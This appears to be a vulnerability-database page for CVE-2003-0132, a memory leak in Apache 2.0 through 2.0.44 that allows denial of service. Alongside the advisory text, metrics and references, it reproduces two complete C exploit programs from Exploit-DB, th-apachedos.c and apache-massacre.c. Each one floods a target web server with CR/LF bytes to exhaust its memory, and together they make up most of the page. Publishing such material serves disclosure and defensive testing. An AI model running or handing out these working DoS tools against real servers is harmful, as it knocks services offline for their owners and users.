CVE-2003-0132 : Detail

CVE-2003-0132

89.2%V3
Network
2003-04-03 03h00 +00:00
2021-06-06 08h09 +00:00

CVE Descriptions

A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-772 Missing Release of Resource after Effective Lifetime
The product does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 11

Publication date : 2003-04-10 22h00 +00:00
Author : Daniel Nyström
EDB Verified : Yes

    /******** th-apachedos.c ********************************************************
    *                                                                               *
    *          Remote Apache DoS exploit                                            *
    *          -------------------------                                            *
    *   Written as a poc for the:                                                   *
    *                                                                               *
    *   This program sends 8000000 \n's to exploit the Apache memory leak.          *
    *   Works from scratch under Linux, as opposed to apache-massacre.c .           *
    *                                                                               *
    *                                                                               *
    *   Daniel Nyström <[email protected]>                                          *
    *                                                                               *
    *                       - www.telhack.tk -                                      *
    *                                                                               *
    ******************************************************** th-apachedos.c ********/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <errno.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <sys/socket.h>

    int main(int argc, char *argv[])
    {
        int sockfd;
        int count;
        char buffer[8000000];
        struct sockaddr_in target;
        struct hostent *he;

        if (argc != 3)
        {
            fprintf(stderr, "\nTH-apachedos.c - Apache <= 2.0.44 DoS exploit.");
            fprintf(stderr, "\n----------------------------------------------");
            fprintf(stderr, "\nUsage: %s <Target> <Port>\n\n", argv[0]);
            exit(-1);
        }

        printf("\nTH-Apache DoS\n");
        printf("-------------\n");
        printf("-> Starting...\n");
        printf("->\n");

        // memset(buffer, '\n', sizeof(buffer)); /* testing */

        for (count = 0; count < 8000000;)
        {
            buffer[count] = '\r'; /* 0x0D */
            count++;
            buffer[count] = '\n'; /* 0x0A */
            count++;
        }

        if ((he=gethostbyname(argv[1])) == NULL)
        {
            herror("gethostbyname() failed ");
            exit(-1);
        }

        memset(&target, 0, sizeof(target));
        target.sin_family = AF_INET;
        target.sin_port = htons(atoi(argv[2]));
        target.sin_addr = *((struct in_addr *)he->h_addr);

        printf("-> Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2]));
        printf("->\n");

        if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
        {
            perror("socket() failed ");
            exit(-1);
        }

        if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0)
        {
            perror("connect() failed ");
            exit(-1);
        }

        printf("-> Connected to %s:%d... Sending linefeeds...\n", inet_ntoa(target.sin_addr), atoi(argv[2]));
        printf("->\n");

        if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))
        {
            perror("send() failed ");
            exit(-1);
            close(sockfd);
        }

        close(sockfd);

        printf("-> Finished smoothly, check hosts apache...\n\n");
    }

    // milw0rm.com [2003-04-11]

Exploit Database EDB-ID : 9

Publication date : 2003-04-08 22h00 +00:00
Author : Matthew Murphy
EDB Verified : Yes

    /* apache-massacre.c
     * Test code for Apache 2.x Memory Leak
     * By Matthew Murphy
     *
     * DISCLAIMER: This exploit tool is provided only to test networks for a
     * known vulnerability. Do not use this tool on systems you do not control,
     * and do not use this tool on networks you do not own without appropriate
     * consent from the network owner. You are responsible for any damage your
     * use of the tool causes. In no event may the author of this tool be held
     * responsible for damages relating to its use.
     *
     * As with most Apache exposures, the impacts vary between ports of the server:
     *
     * Non-Unix (Win32, Netware, OS/2): These ports are most adversely affected
     * by this, as Apache's child process doesn't terminate normally unless the
     * parent process stops. This means that leaks (and any performance loss) hang
     * around until Apache is restarted.
     *
     * Unix/mpm_prefork: This MPM offers the most protection against successful
     * exploitation, as its processes exit at the end of the request.
     *
     * Unix/other MPMs: These other MPMs utilize multiple Apache processes for
     * multiple Apache requests. Depending on the MPM in use and the traffic rates
     * of the server, this may be used to the advantage of a potential attacker.
     * If multiple different Apache processes are utilized, an attacker can spread
     * the substantial leak between processes to dodge resource limits imposed on
     * httpd's UID (usually nobody, www, or apache)
     *
     * Credit: iDEFENSE reported this issue to several security lists on April 8,
     * 2003 following the Apache release announcement. Apache fixed the flaw about
     * a month after the initial disclosure of this vulnerability. iDEFENSE credits
     * the discovery of this vulnerability to an anonymous researcher.
     *
     * Happy Hunting!
     */

    #ifndef _WIN32
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <sys/wait.h>
    #include <sys/stat.h>
    #include <sys/time.h>
    #include <netinet/in.h>
    #include <fcntl.h>
    #else
    #include <windows.h>
    #pragma comment(lib, "wsock32.lib")
    #endif
    #include <stdlib.h>
    #include <stdio.h>

    int sig_fired = 0;

    #ifndef _WIN32
    void sig_handler(int sig) {
    #else
    BOOL WINAPI sig_handler(DWORD dwCtrlType) {
    #endif
        sig_fired = 1;
    #ifndef _WIN32
        return;
    #else
        return TRUE;
    #endif
    }

    int main(int argc, char *argv[]) {
        SOCKET s;
        struct sockaddr_in sin;
        char buffer[1025];
        struct hostent *he;
        unsigned short iPort = 80;
        int newlines = 100;
        char *p;
        char *p2;
        int i;
    #ifdef _WIN32
        WSADATA wsa_prov;
    #endif

        printf("Apache Massacre v1.0\r\n");
        printf("Exploit by Matthew Murphy\r\n");
        printf("Vulnerability reported by iDEFENSE Labs\r\n\r\n");
    #ifdef _WIN32
        if (WSAStartup(0x0101, &wsa_prov)) {
            perror("WSAStartup");
            exit(1);
        }
    #endif
        printf("Please enter the web server's host/IP: ");
        fgets(&buffer[0], 1024, stdin);
        he = gethostbyname(&buffer[0]);
        if (!he) {
            perror("gethostbyname");
            exit(1);
        }
        sin.sin_addr.s_addr = *((unsigned long *)he->h_addr);
        printf("Please enter the web server's port: ");
        fgets(&buffer[0], 1024, stdin);
        iPort = (unsigned short)atoi(&buffer[0]);
    #ifndef _WIN32
    #ifdef _SOLARIS
        sigset(SIGINT, &sig_handler);
    #else
        signal(SIGINT, &sig_handler);
    #endif
    #else
        SetConsoleCtrlHandler(&sig_handler, TRUE);
    #endif
        printf("How many newlines should be in each request [100]: ");
        fgets(&buffer[0], 1024, stdin);
        if (!buffer[0] == 0x0D && !buffer[0] == 0x0A) {
            newlines = atoi(&buffer[0]);
        }
        p = malloc(newlines*2);
        p2 = p;
        for (i = 0; i < newlines; i++) {
            *p2 = 0x0D;
            p2++;
            *p2 = 0x0A;
            p2++;
        }
        newlines += newlines;
        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s < 0) {
            perror("socket");
            exit(1);
        }
        sin.sin_family = AF_INET;
        sin.sin_port = htons(iPort);
        if (connect(s, (const struct sockaddr *)&sin, sizeof(struct sockaddr_in))) {
            perror("connect");
            exit(1);
        }
        while (1) {
            if (!send(s, (char *)p, newlines, 0) == newlines) {
                perror("send");
                exit(1);
            }
            if (sig_fired) {
                printf("Terminating on SIGINT");
                free(p);
    #ifndef _WIN32
                close(s);
    #else
                closesocket(s);
                WSACleanup();
    #endif
                exit(0);
            }
        }
    }

    // milw0rm.com [2003-04-09]

Products Mentioned

Configuration 0

Apache>>Http_server >> Version From (including) 2.0.0 To (including) 2.0.44

References

http://marc.info/?l=bugtraq&m=104994239010517&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.vupen.com/english/advisories/2009/1233
Tags : vdb-entry, x_refsource_VUPEN
http://marc.info/?l=bugtraq&m=105013378320711&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=bugtraq&m=104982175321731&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/34920
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/8499
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=105001663120995&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.redhat.com/support/errata/RHSA-2003-139.html
Tags : vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=104931360606484&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=bugtraq&m=104994309010974&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/206537
Tags : third-party-advisory, x_refsource_CERT-VN